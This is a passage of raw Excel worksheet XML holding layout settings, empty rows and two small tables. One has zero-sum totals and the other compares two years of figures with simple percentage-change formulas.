    <row r="35" s="421" customFormat="1" ht="12"/>
    <row r="36" s="421" customFormat="1" ht="12"/>
    <row r="37" s="421" customFormat="1" ht="12"/>
    <row r="38" s="421" customFormat="1" ht="12"/>
    <row r="39" s="421" customFormat="1" ht="12"/>
    <row r="40" s="421" customFormat="1" ht="12"/>
    <row r="41" s="421" customFormat="1" ht="12"/>
    <row r="42" s="421" customFormat="1" ht="12"/>
    <row r="43" s="421" customFormat="1" ht="12"/>
    <row r="44" s="421" customFormat="1" ht="12"/>
    <row r="45" s="421" customFormat="1" ht="12"/>
    <row r="46" s="421" customFormat="1" ht="12"/>
    <row r="47" s="421" customFormat="1" ht="12"/>
    <row r="48" s="421" customFormat="1" ht="12"/>
    <row r="49" s="421" customFormat="1" ht="12"/>
    <row r="50" s="421" customFormat="1" ht="12"/>
    <row r="51" s="421" customFormat="1" ht="12"/>
    <row r="52" s="421" customFormat="1" ht="12"/>
    <row r="53" s="421" customFormat="1" ht="12"/>
    <row r="54" s="421" customFormat="1" ht="12"/>
    <row r="55" s="421" customFormat="1" ht="12"/>
    <row r="56" s="421" customFormat="1" ht="12"/>
    <row r="57" s="421" customFormat="1" ht="12"/>
    <row r="58" s="421" customFormat="1" ht="12"/>
    <row r="59" s="421" customFormat="1" ht="12"/>
    <row r="60" s="421" customFormat="1" ht="12"/>
    <row r="61" s="421" customFormat="1" ht="12"/>
    <row r="62" s="421" customFormat="1" ht="12"/>
    <row r="63" s="421" customFormat="1" ht="12"/>
    <row r="64" s="421" customFormat="1" ht="12"/>
    <row r="65" s="421" customFormat="1" ht="12"/>
    <row r="66" s="421" customFormat="1" ht="12"/>
    <row r="67" s="421" customFormat="1" ht="12"/>
    <row r="68" s="421" customFormat="1" ht="12"/>
    <row r="69" s="421" customFormat="1" ht="12"/>
    <row r="70" s="421" customFormat="1" ht="12"/>
    <row r="71" s="421" customFormat="1" ht="12"/>
    <row r="72" s="421" customFormat="1" ht="12"/>
    <row r="73" s="421" customFormat="1" ht="12"/>
    <row r="74" s="421" customFormat="1" ht="12"/>
    <row r="75" s="421" customFormat="1" ht="12"/>
    <row r="76" s="421" customFormat="1" ht="12"/>
    <row r="77" s="421" customFormat="1" ht="12"/>
    <row r="78" s="421" customFormat="1" ht="12"/>
    <row r="79" s="421" customFormat="1" ht="12"/>
    <row r="80" s="421" customFormat="1" ht="12"/>
    <row r="81" s="421" customFormat="1" ht="12"/>
    <row r="82" s="421" customFormat="1" ht="12"/>
    <row r="83" s="421" customFormat="1" ht="12"/>
    <row r="84" s="421" customFormat="1" ht="12"/>
    <row r="85" s="421" customFormat="1" ht="12"/>
    <row r="86" s="421" customFormat="1" ht="12"/>
    <row r="87" s="421" customFormat="1" ht="12"/>
    <row r="88" s="421" customFormat="1" ht="12"/>
    <row r="89" s="421" customFormat="1" ht="12"/>
    <row r="90" s="421" customFormat="1" ht="12"/>
    <row r="91" s="421" customFormat="1" ht="12"/>
    <row r="92" s="421" customFormat="1" ht="12"/>
    <row r="93" s="421" customFormat="1" ht="12"/>
    <row r="94" s="421" customFormat="1" ht="12"/>
    <row r="95" s="421" customFormat="1" ht="12"/>
    <row r="96" s="421" customFormat="1" ht="12"/>
    <row r="97" s="421" customFormat="1" ht="12"/>
    <row r="98" s="421" customFormat="1" ht="12"/>
    <row r="99" s="421" customFormat="1" ht="12"/>
    <row r="100" s="421" customFormat="1" ht="12"/>
    <row r="101" s="421" customFormat="1" ht="12"/>
    <row r="102" s="421" customFormat="1" ht="12"/>
    <row r="103" s="421" customFormat="1" ht="12"/>
    <row r="104" s="421" customFormat="1" ht="12"/>
    <row r="105" s="421" customFormat="1" ht="12"/>
    <row r="106" s="421" customFormat="1" ht="12"/>
    <row r="107" s="421" customFormat="1" ht="12"/>
    <row r="108" s="421" customFormat="1" ht="12"/>
    <row r="109" s="421" customFormat="1" ht="12"/>
    <row r="110" s="421" customFormat="1" ht="12"/>
    <row r="111" s="421" customFormat="1" ht="12"/>
    <row r="112" s="421" customFormat="1" ht="12"/>
    <row r="113" s="421" customFormat="1" ht="12"/>
    <row r="114" s="421" customFormat="1" ht="12"/>
    <row r="115" s="421" customFormat="1" ht="12"/>
    <row r="116" s="421" customFormat="1" ht="12"/>
    <row r="117" s="421" customFormat="1" ht="12"/>
    <row r="118" s="421" customFormat="1" ht="12"/>
    <row r="119" s="421" customFormat="1" ht="12"/>
    <row r="120" s="421" customFormat="1" ht="12"/>
    <row r="121" s="421" customFormat="1" ht="12"/>
    <row r="122" s="421" customFormat="1" ht="12"/>
    <row r="123" s="421" customFormat="1" ht="12"/>
    <row r="124" s="421" customFormat="1" ht="12"/>
    <row r="125" s="421" customFormat="1" ht="12"/>
    <row r="126" s="421" customFormat="1" ht="12"/>
    <row r="127" s="421" customFormat="1" ht="12"/>
    <row r="128" s="421" customFormat="1" ht="12"/>
    <row r="129" s="421" customFormat="1" ht="12"/>
    <row r="130" s="421" customFormat="1" ht="12"/>
    <row r="131" s="421" customFormat="1" ht="12"/>
    <row r="132" s="421" customFormat="1" ht="12"/>
    <row r="133" s="421" customFormat="1" ht="12"/>
    <row r="134" s="421" customFormat="1" ht="12"/>
    <row r="135" s="421" customFormat="1" ht="12"/>
    <row r="136" s="421" customFormat="1" ht="12"/>
    <row r="137" s="421" customFormat="1" ht="12"/>
    <row r="138" s="421" customFormat="1" ht="12"/>
    <row r="139" s="421" customFormat="1" ht="12"/>
    <row r="140" s="421" customFormat="1" ht="12"/>
    <row r="141" s="421" customFormat="1" ht="12"/>
    <row r="142" s="421" customFormat="1" ht="12"/>
    <row r="143" s="421" customFormat="1" ht="12"/>
    <row r="144" s="421" customFormat="1" ht="12"/>
    <row r="145" s="421" customFormat="1" ht="12"/>
    <row r="146" s="421" customFormat="1" ht="12"/>
    <row r="147" s="421" customFormat="1" ht="12"/>
    <row r="148" s="421" customFormat="1" ht="12"/>
    <row r="149" s="421" customFormat="1" ht="12"/>
    <row r="150" s="421" customFormat="1" ht="12"/>
    <row r="151" s="421" customFormat="1" ht="12"/>
    <row r="152" s="421" customFormat="1" ht="12"/>
    <row r="153" s="421" customFormat="1" ht="12"/>
    <row r="154" s="421" customFormat="1" ht="12"/>
    <row r="155" s="421" customFormat="1" ht="12"/>
    <row r="156" s="421" customFormat="1" ht="12"/>
    <row r="157" s="421" customFormat="1" ht="12"/>
    <row r="158" s="421" customFormat="1" ht="12"/>
    <row r="159" s="421" customFormat="1" ht="12"/>
    <row r="160" s="421" customFormat="1" ht="12"/>
    <row r="161" s="421" customFormat="1" ht="12"/>
    <row r="162" s="421" customFormat="1" ht="12"/>
    <row r="163" s="421" customFormat="1" ht="12"/>
    <row r="164" s="421" customFormat="1" ht="12"/>
    <row r="165" s="421" customFormat="1" ht="12"/>
    <row r="166" s="421" customFormat="1" ht="12"/>
    <row r="167" s="421" customFormat="1" ht="12"/>
    <row r="168" s="421" customFormat="1" ht="12"/>
    <row r="169" s="421" customFormat="1" ht="12"/>
    <row r="170" s="421" customFormat="1" ht="12"/>
    <row r="171" s="421" customFormat="1" ht="12"/>
    <row r="172" s="421" customFormat="1" ht="12"/>
    <row r="173" s="421" customFormat="1" ht="12"/>
    <row r="174" s="421" customFormat="1" ht="12"/>
    <row r="175" s="421" customFormat="1" ht="12"/>
    <row r="176" s="421" customFormat="1" ht="12"/>
    <row r="177" s="421" customFormat="1" ht="12"/>
    <row r="178" s="421" customFormat="1" ht="12"/>
    <row r="179" s="421" customFormat="1" ht="12"/>
    <row r="180" s="421" customFormat="1" ht="12"/>
    <row r="181" s="421" customFormat="1" ht="12"/>
    <row r="182" s="421" customFormat="1" ht="12"/>
    <row r="183" s="421" customFormat="1" ht="12"/>
  </sheetData>
  <mergeCells count="2">
    <mergeCell ref="A2:D2"/>
    <mergeCell ref="A3:D3"/>
  </mergeCells>
  <printOptions horizontalCentered="1"/>
  <pageMargins left="0.59" right="0.59" top="0.79" bottom="0.79" header="0.31" footer="0.31"/>
  <pageSetup paperSize="9" fitToHeight="0" orientation="portrait" useFirstPageNumber="1" errors="NA"/>
  <headerFooter alignWithMargins="0"/>
</worksheet>
</file>

<file path=xl/worksheets/sheet5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599993896298105"/>
    <pageSetUpPr fitToPage="1"/>
  </sheetPr>
  <dimension ref="A1:G62"/>
  <sheetViews>
    <sheetView workbookViewId="0">
      <pane xSplit="3" ySplit="6" topLeftCell="D7" activePane="bottomRight" state="frozen"/>
      <selection/>
      <selection pane="topRight"/>
      <selection pane="bottomLeft"/>
      <selection pane="bottomRight" activeCell="C7" sqref="C7:C15"/>
    </sheetView>
  </sheetViews>
  <sheetFormatPr defaultColWidth="10" defaultRowHeight="15.6" outlineLevelCol="6"/>
  <cols>
    <col min="1" max="1" width="17.2777777777778" style="184" customWidth="1"/>
    <col min="2" max="2" width="18.7222222222222" style="184" customWidth="1"/>
    <col min="3" max="4" width="19" style="184" customWidth="1"/>
    <col min="5" max="5" width="14.7222222222222" style="184" customWidth="1"/>
    <col min="6" max="16384" width="10" style="184"/>
  </cols>
  <sheetData>
    <row r="1" ht="18" customHeight="1" spans="1:6">
      <c r="A1" s="394" t="s">
        <v>2179</v>
      </c>
      <c r="B1" s="395"/>
      <c r="C1" s="395"/>
      <c r="D1" s="395"/>
      <c r="E1" s="396"/>
      <c r="F1" s="397"/>
    </row>
    <row r="2" ht="56.45" customHeight="1" spans="1:6">
      <c r="A2" s="398" t="s">
        <v>2180</v>
      </c>
      <c r="B2" s="399"/>
      <c r="C2" s="399"/>
      <c r="D2" s="399"/>
      <c r="E2" s="399"/>
      <c r="F2" s="400"/>
    </row>
    <row r="3" ht="18.95" customHeight="1" spans="1:6">
      <c r="A3" s="401"/>
      <c r="B3" s="402"/>
      <c r="C3" s="402"/>
      <c r="D3" s="402"/>
      <c r="E3" s="402" t="s">
        <v>373</v>
      </c>
      <c r="F3" s="403"/>
    </row>
    <row r="4" ht="27" customHeight="1" spans="1:6">
      <c r="A4" s="404" t="s">
        <v>812</v>
      </c>
      <c r="B4" s="405" t="s">
        <v>813</v>
      </c>
      <c r="C4" s="406" t="s">
        <v>814</v>
      </c>
      <c r="D4" s="406"/>
      <c r="E4" s="406"/>
      <c r="F4" s="403"/>
    </row>
    <row r="5" ht="45" customHeight="1" spans="1:6">
      <c r="A5" s="404"/>
      <c r="B5" s="405"/>
      <c r="C5" s="407" t="s">
        <v>815</v>
      </c>
      <c r="D5" s="407" t="s">
        <v>816</v>
      </c>
      <c r="E5" s="407" t="s">
        <v>817</v>
      </c>
      <c r="F5" s="408"/>
    </row>
    <row r="6" ht="32.45" customHeight="1" spans="1:6">
      <c r="A6" s="409" t="s">
        <v>705</v>
      </c>
      <c r="B6" s="410">
        <f>C6+D6+E6</f>
        <v>0</v>
      </c>
      <c r="C6" s="410">
        <v>0</v>
      </c>
      <c r="D6" s="411"/>
      <c r="E6" s="411"/>
      <c r="F6" s="412"/>
    </row>
    <row r="7" ht="32.45" customHeight="1" spans="1:6">
      <c r="A7" s="409" t="s">
        <v>706</v>
      </c>
      <c r="B7" s="410">
        <f t="shared" ref="B7:B16" si="0">C7+D7+E7</f>
        <v>0</v>
      </c>
      <c r="C7" s="410">
        <v>0</v>
      </c>
      <c r="D7" s="411"/>
      <c r="E7" s="411"/>
      <c r="F7" s="412"/>
    </row>
    <row r="8" ht="32.45" customHeight="1" spans="1:6">
      <c r="A8" s="409" t="s">
        <v>707</v>
      </c>
      <c r="B8" s="410">
        <f t="shared" si="0"/>
        <v>0</v>
      </c>
      <c r="C8" s="410">
        <v>0</v>
      </c>
      <c r="D8" s="411"/>
      <c r="E8" s="411"/>
      <c r="F8" s="412"/>
    </row>
    <row r="9" ht="32.45" customHeight="1" spans="1:6">
      <c r="A9" s="409" t="s">
        <v>708</v>
      </c>
      <c r="B9" s="410">
        <f t="shared" si="0"/>
        <v>0</v>
      </c>
      <c r="C9" s="410">
        <v>0</v>
      </c>
      <c r="D9" s="411"/>
      <c r="E9" s="411"/>
      <c r="F9" s="412"/>
    </row>
    <row r="10" ht="32.45" customHeight="1" spans="1:6">
      <c r="A10" s="409" t="s">
        <v>709</v>
      </c>
      <c r="B10" s="410">
        <f t="shared" si="0"/>
        <v>0</v>
      </c>
      <c r="C10" s="410">
        <v>0</v>
      </c>
      <c r="D10" s="411"/>
      <c r="E10" s="411"/>
      <c r="F10" s="412"/>
    </row>
    <row r="11" ht="32.45" customHeight="1" spans="1:6">
      <c r="A11" s="409" t="s">
        <v>710</v>
      </c>
      <c r="B11" s="410">
        <f t="shared" si="0"/>
        <v>0</v>
      </c>
      <c r="C11" s="410">
        <v>0</v>
      </c>
      <c r="D11" s="411"/>
      <c r="E11" s="411"/>
      <c r="F11" s="412"/>
    </row>
    <row r="12" ht="32.45" customHeight="1" spans="1:6">
      <c r="A12" s="409" t="s">
        <v>711</v>
      </c>
      <c r="B12" s="410">
        <f t="shared" si="0"/>
        <v>0</v>
      </c>
      <c r="C12" s="410">
        <v>0</v>
      </c>
      <c r="D12" s="411"/>
      <c r="E12" s="411"/>
      <c r="F12" s="412"/>
    </row>
    <row r="13" ht="32.45" customHeight="1" spans="1:6">
      <c r="A13" s="409" t="s">
        <v>712</v>
      </c>
      <c r="B13" s="410">
        <f t="shared" si="0"/>
        <v>0</v>
      </c>
      <c r="C13" s="410">
        <v>0</v>
      </c>
      <c r="D13" s="411"/>
      <c r="E13" s="411"/>
      <c r="F13" s="412"/>
    </row>
    <row r="14" ht="32.45" customHeight="1" spans="1:6">
      <c r="A14" s="409" t="s">
        <v>713</v>
      </c>
      <c r="B14" s="410">
        <f t="shared" si="0"/>
        <v>0</v>
      </c>
      <c r="C14" s="410">
        <v>0</v>
      </c>
      <c r="D14" s="411"/>
      <c r="E14" s="411"/>
      <c r="F14" s="412"/>
    </row>
    <row r="15" ht="32.45" customHeight="1" spans="1:6">
      <c r="A15" s="409" t="s">
        <v>714</v>
      </c>
      <c r="B15" s="410">
        <f t="shared" si="0"/>
        <v>0</v>
      </c>
      <c r="C15" s="410">
        <v>0</v>
      </c>
      <c r="D15" s="411"/>
      <c r="E15" s="411"/>
      <c r="F15" s="412"/>
    </row>
    <row r="16" ht="32.45" customHeight="1" spans="1:7">
      <c r="A16" s="413" t="s">
        <v>813</v>
      </c>
      <c r="B16" s="414">
        <f t="shared" si="0"/>
        <v>0</v>
      </c>
      <c r="C16" s="415">
        <f>SUM(C6:C15)</f>
        <v>0</v>
      </c>
      <c r="D16" s="415"/>
      <c r="E16" s="415"/>
      <c r="F16" s="412"/>
      <c r="G16" s="416"/>
    </row>
    <row r="17" ht="27.95" customHeight="1" spans="1:6">
      <c r="A17" s="316" t="s">
        <v>818</v>
      </c>
      <c r="B17" s="417"/>
      <c r="C17" s="417"/>
      <c r="D17" s="417"/>
      <c r="E17" s="417"/>
      <c r="F17" s="418"/>
    </row>
    <row r="18" ht="14.4" spans="1:6">
      <c r="A18" s="418"/>
      <c r="B18" s="417"/>
      <c r="C18" s="417"/>
      <c r="D18" s="417"/>
      <c r="E18" s="417"/>
      <c r="F18" s="418"/>
    </row>
    <row r="19" ht="14.4" spans="1:6">
      <c r="A19" s="418"/>
      <c r="B19" s="417"/>
      <c r="C19" s="417"/>
      <c r="D19" s="417"/>
      <c r="E19" s="417"/>
      <c r="F19" s="418"/>
    </row>
    <row r="20" ht="14.4" spans="1:6">
      <c r="A20" s="418"/>
      <c r="B20" s="417"/>
      <c r="C20" s="417"/>
      <c r="D20" s="417"/>
      <c r="E20" s="417"/>
      <c r="F20" s="418"/>
    </row>
    <row r="21" ht="14.4" spans="1:6">
      <c r="A21" s="418"/>
      <c r="B21" s="417"/>
      <c r="C21" s="417"/>
      <c r="D21" s="417"/>
      <c r="E21" s="417"/>
      <c r="F21" s="418"/>
    </row>
    <row r="22" ht="14.4" spans="1:6">
      <c r="A22" s="418"/>
      <c r="B22" s="417"/>
      <c r="C22" s="417"/>
      <c r="D22" s="417"/>
      <c r="E22" s="417"/>
      <c r="F22" s="418"/>
    </row>
    <row r="23" ht="14.4" spans="1:6">
      <c r="A23" s="418"/>
      <c r="B23" s="417"/>
      <c r="C23" s="417"/>
      <c r="D23" s="417"/>
      <c r="E23" s="417"/>
      <c r="F23" s="418"/>
    </row>
    <row r="24" ht="14.4" spans="1:6">
      <c r="A24" s="418"/>
      <c r="B24" s="417"/>
      <c r="C24" s="417"/>
      <c r="D24" s="417"/>
      <c r="E24" s="417"/>
      <c r="F24" s="418"/>
    </row>
    <row r="25" spans="2:5">
      <c r="B25" s="417"/>
      <c r="C25" s="417"/>
      <c r="D25" s="417"/>
      <c r="E25" s="417"/>
    </row>
    <row r="26" ht="14.4" spans="1:6">
      <c r="A26" s="418"/>
      <c r="B26" s="417"/>
      <c r="C26" s="417"/>
      <c r="D26" s="417"/>
      <c r="E26" s="417"/>
      <c r="F26" s="418"/>
    </row>
    <row r="27" ht="14.4" spans="1:6">
      <c r="A27" s="418"/>
      <c r="B27" s="417"/>
      <c r="C27" s="417"/>
      <c r="D27" s="417"/>
      <c r="E27" s="417"/>
      <c r="F27" s="418"/>
    </row>
    <row r="28" ht="14.4" spans="1:6">
      <c r="A28" s="418"/>
      <c r="B28" s="417"/>
      <c r="C28" s="417"/>
      <c r="D28" s="417"/>
      <c r="E28" s="417"/>
      <c r="F28" s="418"/>
    </row>
    <row r="29" ht="14.4" spans="1:6">
      <c r="A29" s="418"/>
      <c r="B29" s="417"/>
      <c r="C29" s="417"/>
      <c r="D29" s="417"/>
      <c r="E29" s="417"/>
      <c r="F29" s="418"/>
    </row>
    <row r="30" ht="14.4" spans="1:6">
      <c r="A30" s="418"/>
      <c r="B30" s="417"/>
      <c r="C30" s="417"/>
      <c r="D30" s="417"/>
      <c r="E30" s="417"/>
      <c r="F30" s="418"/>
    </row>
    <row r="31" ht="14.4" spans="1:6">
      <c r="A31" s="418"/>
      <c r="B31" s="417"/>
      <c r="C31" s="417"/>
      <c r="D31" s="417"/>
      <c r="E31" s="417"/>
      <c r="F31" s="418"/>
    </row>
    <row r="32" ht="14.4" spans="1:6">
      <c r="A32" s="418"/>
      <c r="B32" s="417"/>
      <c r="C32" s="417"/>
      <c r="D32" s="417"/>
      <c r="E32" s="417"/>
      <c r="F32" s="418"/>
    </row>
    <row r="33" ht="14.4" spans="1:6">
      <c r="A33" s="418"/>
      <c r="B33" s="417"/>
      <c r="C33" s="417"/>
      <c r="D33" s="417"/>
      <c r="E33" s="417"/>
      <c r="F33" s="418"/>
    </row>
    <row r="34" spans="2:5">
      <c r="B34" s="417"/>
      <c r="C34" s="417"/>
      <c r="D34" s="417"/>
      <c r="E34" s="417"/>
    </row>
    <row r="35" spans="2:5">
      <c r="B35" s="417"/>
      <c r="C35" s="417"/>
      <c r="D35" s="417"/>
      <c r="E35" s="417"/>
    </row>
    <row r="36" spans="2:5">
      <c r="B36" s="417"/>
      <c r="C36" s="417"/>
      <c r="D36" s="417"/>
      <c r="E36" s="417"/>
    </row>
    <row r="37" spans="2:5">
      <c r="B37" s="417"/>
      <c r="C37" s="417"/>
      <c r="D37" s="417"/>
      <c r="E37" s="417"/>
    </row>
    <row r="38" spans="2:5">
      <c r="B38" s="417"/>
      <c r="C38" s="417"/>
      <c r="D38" s="417"/>
      <c r="E38" s="417"/>
    </row>
    <row r="39" spans="2:5">
      <c r="B39" s="417"/>
      <c r="C39" s="417"/>
      <c r="D39" s="417"/>
      <c r="E39" s="417"/>
    </row>
    <row r="40" spans="2:5">
      <c r="B40" s="417"/>
      <c r="C40" s="417"/>
      <c r="D40" s="417"/>
      <c r="E40" s="417"/>
    </row>
    <row r="41" spans="2:5">
      <c r="B41" s="417"/>
      <c r="C41" s="417"/>
      <c r="D41" s="417"/>
      <c r="E41" s="417"/>
    </row>
    <row r="42" spans="2:5">
      <c r="B42" s="417"/>
      <c r="C42" s="417"/>
      <c r="D42" s="417"/>
      <c r="E42" s="417"/>
    </row>
    <row r="43" spans="2:5">
      <c r="B43" s="417"/>
      <c r="C43" s="417"/>
      <c r="D43" s="417"/>
      <c r="E43" s="417"/>
    </row>
    <row r="44" spans="2:5">
      <c r="B44" s="417"/>
      <c r="C44" s="417"/>
      <c r="D44" s="417"/>
      <c r="E44" s="417"/>
    </row>
    <row r="45" spans="2:5">
      <c r="B45" s="417"/>
      <c r="C45" s="417"/>
      <c r="D45" s="417"/>
      <c r="E45" s="417"/>
    </row>
    <row r="46" spans="2:5">
      <c r="B46" s="417"/>
      <c r="C46" s="417"/>
      <c r="D46" s="417"/>
      <c r="E46" s="417"/>
    </row>
    <row r="47" spans="2:5">
      <c r="B47" s="417"/>
      <c r="C47" s="417"/>
      <c r="D47" s="417"/>
      <c r="E47" s="417"/>
    </row>
    <row r="48" spans="2:5">
      <c r="B48" s="417"/>
      <c r="C48" s="417"/>
      <c r="D48" s="417"/>
      <c r="E48" s="417"/>
    </row>
    <row r="49" spans="2:5">
      <c r="B49" s="417"/>
      <c r="C49" s="417"/>
      <c r="D49" s="417"/>
      <c r="E49" s="417"/>
    </row>
    <row r="50" spans="2:5">
      <c r="B50" s="417"/>
      <c r="C50" s="417"/>
      <c r="D50" s="417"/>
      <c r="E50" s="417"/>
    </row>
    <row r="51" spans="2:5">
      <c r="B51" s="417"/>
      <c r="C51" s="417"/>
      <c r="D51" s="417"/>
      <c r="E51" s="417"/>
    </row>
    <row r="52" spans="2:5">
      <c r="B52" s="417"/>
      <c r="C52" s="417"/>
      <c r="D52" s="417"/>
      <c r="E52" s="417"/>
    </row>
    <row r="53" spans="2:5">
      <c r="B53" s="417"/>
      <c r="C53" s="417"/>
      <c r="D53" s="417"/>
      <c r="E53" s="417"/>
    </row>
    <row r="54" spans="2:5">
      <c r="B54" s="417"/>
      <c r="C54" s="417"/>
      <c r="D54" s="417"/>
      <c r="E54" s="417"/>
    </row>
    <row r="55" spans="2:5">
      <c r="B55" s="417"/>
      <c r="C55" s="417"/>
      <c r="D55" s="417"/>
      <c r="E55" s="417"/>
    </row>
    <row r="56" spans="2:5">
      <c r="B56" s="417"/>
      <c r="C56" s="417"/>
      <c r="D56" s="417"/>
      <c r="E56" s="417"/>
    </row>
    <row r="57" spans="2:5">
      <c r="B57" s="417"/>
      <c r="C57" s="417"/>
      <c r="D57" s="417"/>
      <c r="E57" s="417"/>
    </row>
    <row r="58" spans="2:5">
      <c r="B58" s="417"/>
      <c r="C58" s="417"/>
      <c r="D58" s="417"/>
      <c r="E58" s="417"/>
    </row>
    <row r="59" spans="2:5">
      <c r="B59" s="417"/>
      <c r="C59" s="417"/>
      <c r="D59" s="417"/>
      <c r="E59" s="417"/>
    </row>
    <row r="60" spans="2:5">
      <c r="B60" s="417"/>
      <c r="C60" s="417"/>
      <c r="D60" s="417"/>
      <c r="E60" s="417"/>
    </row>
    <row r="61" spans="2:5">
      <c r="B61" s="417"/>
      <c r="C61" s="417"/>
      <c r="D61" s="417"/>
      <c r="E61" s="417"/>
    </row>
    <row r="62" spans="2:5">
      <c r="B62" s="417"/>
      <c r="C62" s="417"/>
      <c r="D62" s="417"/>
      <c r="E62" s="417"/>
    </row>
  </sheetData>
  <mergeCells count="4">
    <mergeCell ref="A2:E2"/>
    <mergeCell ref="C4:E4"/>
    <mergeCell ref="A4:A5"/>
    <mergeCell ref="B4:B5"/>
  </mergeCells>
  <printOptions horizontalCentered="1"/>
  <pageMargins left="0.75" right="0.75" top="1" bottom="1" header="0.51" footer="0.51"/>
  <pageSetup paperSize="9" orientation="portrait"/>
  <headerFooter/>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599993896298105"/>
  </sheetPr>
  <dimension ref="A1:D15"/>
  <sheetViews>
    <sheetView showZeros="0" workbookViewId="0">
      <pane xSplit="2" ySplit="4" topLeftCell="C5" activePane="bottomRight" state="frozen"/>
      <selection/>
      <selection pane="topRight"/>
      <selection pane="bottomLeft"/>
      <selection pane="bottomRight" activeCell="B12" sqref="B12:C14"/>
    </sheetView>
  </sheetViews>
  <sheetFormatPr defaultColWidth="8.84259259259259" defaultRowHeight="15.6" outlineLevelCol="3"/>
  <cols>
    <col min="1" max="1" width="37.6666666666667" style="373" customWidth="1"/>
    <col min="2" max="3" width="20.7222222222222" style="373" customWidth="1"/>
    <col min="4" max="4" width="17.4259259259259" style="373" customWidth="1"/>
    <col min="5" max="122" width="9.14814814814815" style="373" customWidth="1"/>
    <col min="123" max="138" width="10.2777777777778" style="373" customWidth="1"/>
    <col min="139" max="219" width="9.14814814814815" style="373" customWidth="1"/>
    <col min="220" max="222" width="8.84259259259259" style="373"/>
    <col min="223" max="16384" width="8.84259259259259" style="378"/>
  </cols>
  <sheetData>
    <row r="1" s="373" customFormat="1" ht="24" customHeight="1" spans="1:4">
      <c r="A1" s="334" t="s">
        <v>2181</v>
      </c>
      <c r="B1" s="379"/>
      <c r="C1" s="379"/>
      <c r="D1" s="379"/>
    </row>
    <row r="2" s="374" customFormat="1" ht="33.95" customHeight="1" spans="1:4">
      <c r="A2" s="380" t="s">
        <v>2182</v>
      </c>
      <c r="B2" s="380"/>
      <c r="C2" s="380"/>
      <c r="D2" s="380"/>
    </row>
    <row r="3" s="375" customFormat="1" ht="21" customHeight="1" spans="1:4">
      <c r="A3" s="381" t="s">
        <v>373</v>
      </c>
      <c r="B3" s="381"/>
      <c r="C3" s="381"/>
      <c r="D3" s="381"/>
    </row>
    <row r="4" s="376" customFormat="1" ht="29.1" customHeight="1" spans="1:4">
      <c r="A4" s="382" t="s">
        <v>931</v>
      </c>
      <c r="B4" s="383" t="s">
        <v>519</v>
      </c>
      <c r="C4" s="384" t="s">
        <v>829</v>
      </c>
      <c r="D4" s="385" t="s">
        <v>619</v>
      </c>
    </row>
    <row r="5" s="377" customFormat="1" ht="23.1" customHeight="1" spans="1:4">
      <c r="A5" s="382"/>
      <c r="B5" s="383"/>
      <c r="C5" s="384"/>
      <c r="D5" s="385"/>
    </row>
    <row r="6" s="377" customFormat="1" ht="24" customHeight="1" spans="1:4">
      <c r="A6" s="386" t="s">
        <v>623</v>
      </c>
      <c r="B6" s="387">
        <v>59631</v>
      </c>
      <c r="C6" s="387">
        <v>63779</v>
      </c>
      <c r="D6" s="364">
        <f t="shared" ref="D6:D14" si="0">(C6-B6)/B6*100</f>
        <v>6.95611343093358</v>
      </c>
    </row>
    <row r="7" s="377" customFormat="1" ht="24" customHeight="1" spans="1:4">
      <c r="A7" s="388" t="s">
        <v>621</v>
      </c>
      <c r="B7" s="389">
        <v>30220</v>
      </c>
      <c r="C7" s="366">
        <v>31142</v>
      </c>
      <c r="D7" s="367">
        <f t="shared" si="0"/>
        <v>3.05095962938451</v>
      </c>
    </row>
    <row r="8" s="377" customFormat="1" ht="24" customHeight="1" spans="1:4">
      <c r="A8" s="388" t="s">
        <v>622</v>
      </c>
      <c r="B8" s="389">
        <v>28500</v>
      </c>
      <c r="C8" s="366">
        <v>32000</v>
      </c>
      <c r="D8" s="367">
        <f t="shared" si="0"/>
        <v>12.280701754386</v>
      </c>
    </row>
    <row r="9" s="377" customFormat="1" ht="24" customHeight="1" spans="1:4">
      <c r="A9" s="388" t="s">
        <v>624</v>
      </c>
      <c r="B9" s="389">
        <v>33081</v>
      </c>
      <c r="C9" s="389">
        <v>51861</v>
      </c>
      <c r="D9" s="367">
        <f t="shared" si="0"/>
        <v>56.769746984674</v>
      </c>
    </row>
    <row r="10" s="377" customFormat="1" ht="24" customHeight="1" spans="1:4">
      <c r="A10" s="388" t="s">
        <v>621</v>
      </c>
      <c r="B10" s="389">
        <v>2571</v>
      </c>
      <c r="C10" s="366">
        <v>6151</v>
      </c>
      <c r="D10" s="367">
        <f t="shared" si="0"/>
        <v>139.245429793855</v>
      </c>
    </row>
    <row r="11" s="377" customFormat="1" ht="24" customHeight="1" spans="1:4">
      <c r="A11" s="388" t="s">
        <v>622</v>
      </c>
      <c r="B11" s="389">
        <v>28211</v>
      </c>
      <c r="C11" s="366">
        <v>41845</v>
      </c>
      <c r="D11" s="367">
        <f t="shared" si="0"/>
        <v>48.3286661231435</v>
      </c>
    </row>
    <row r="12" s="377" customFormat="1" ht="24" customHeight="1" spans="1:4">
      <c r="A12" s="390" t="s">
        <v>620</v>
      </c>
      <c r="B12" s="391">
        <v>92712</v>
      </c>
      <c r="C12" s="391">
        <v>115640</v>
      </c>
      <c r="D12" s="369">
        <f t="shared" si="0"/>
        <v>24.7303477435499</v>
      </c>
    </row>
    <row r="13" s="377" customFormat="1" ht="24" customHeight="1" spans="1:4">
      <c r="A13" s="388" t="s">
        <v>621</v>
      </c>
      <c r="B13" s="389">
        <v>32790</v>
      </c>
      <c r="C13" s="366">
        <v>37293</v>
      </c>
      <c r="D13" s="367">
        <f t="shared" si="0"/>
        <v>13.7328453796889</v>
      </c>
    </row>
    <row r="14" s="377" customFormat="1" ht="24" customHeight="1" spans="1:4">
      <c r="A14" s="392" t="s">
        <v>622</v>
      </c>
      <c r="B14" s="393">
        <v>56711</v>
      </c>
      <c r="C14" s="371">
        <v>73845</v>
      </c>
      <c r="D14" s="372">
        <f t="shared" si="0"/>
        <v>30.2128334890938</v>
      </c>
    </row>
    <row r="15" ht="24" customHeight="1"/>
  </sheetData>
  <mergeCells count="6">
    <mergeCell ref="A2:D2"/>
    <mergeCell ref="A3:D3"/>
    <mergeCell ref="A4:A5"/>
    <mergeCell ref="B4:B5"/>
    <mergeCell ref="C4:C5"/>
    <mergeCell ref="D4:D5"/>
  </mergeCells>
  <printOptions horizontalCentered="1"/>
  <pageMargins left="0.511805555555556" right="0.275" top="0.79" bottom="0.79" header="0.31" footer="0.31"/>
  <pageSetup paperSize="9" scale="98" orientation="portrait" useFirstPageNumber="1" errors="NA"/>
  <headerFooter alignWithMargins="0"/>
</worksheet>
</file>

<file path=xl/worksheets/sheet5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599993896298105"/>
    <pageSetUpPr fitToPage="1"/>
